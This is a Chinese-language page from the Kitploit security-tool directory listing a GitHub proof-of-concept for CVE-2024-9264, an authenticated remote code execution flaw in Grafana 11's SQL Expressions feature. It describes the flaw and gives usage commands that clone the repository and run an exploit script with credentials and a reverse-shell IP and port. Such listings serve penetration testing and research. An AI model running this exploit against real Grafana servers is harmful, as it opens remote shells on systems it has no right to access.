Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9264 — Grafana (v11.0) 中通过 SQL 表达式实现认证远程代码执行 (RCE) - PoC 漏洞利用 | Kitploit
工具/GitHubGitHub/rvzsec/cve-2024-9264
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

Grafana (v11.0) 中通过 SQL 表达式实现认证远程代码执行 (RCE) - PoC 漏洞利用

查看仓库
241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-9264

通过 SQL 表达式在 Grafana (v11.0) 中实现认证 RCE - PoC 漏洞利用



logo

CVE-2024-9264 - Grafana v11.0
认证远程代码执行 (RCE)

PoC


简介

CVE-2024-9264 是 Grafana 11 的实验性“SQL 表达式”功能中引入的一个严重远程代码执行和本地文件包含漏洞。该 API 将用户提供的 SQL 直接传递给 DuckDB CLI,而未进行充分的清理,因此任何拥有 Viewer 或更高级别权限的认证账户都可以注入 shell 命令或读取任意文件,前提是 duckdb 二进制文件位于服务器的 PATH 中。


使用方法

git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# 使用方法
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

示例:

./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
下载工具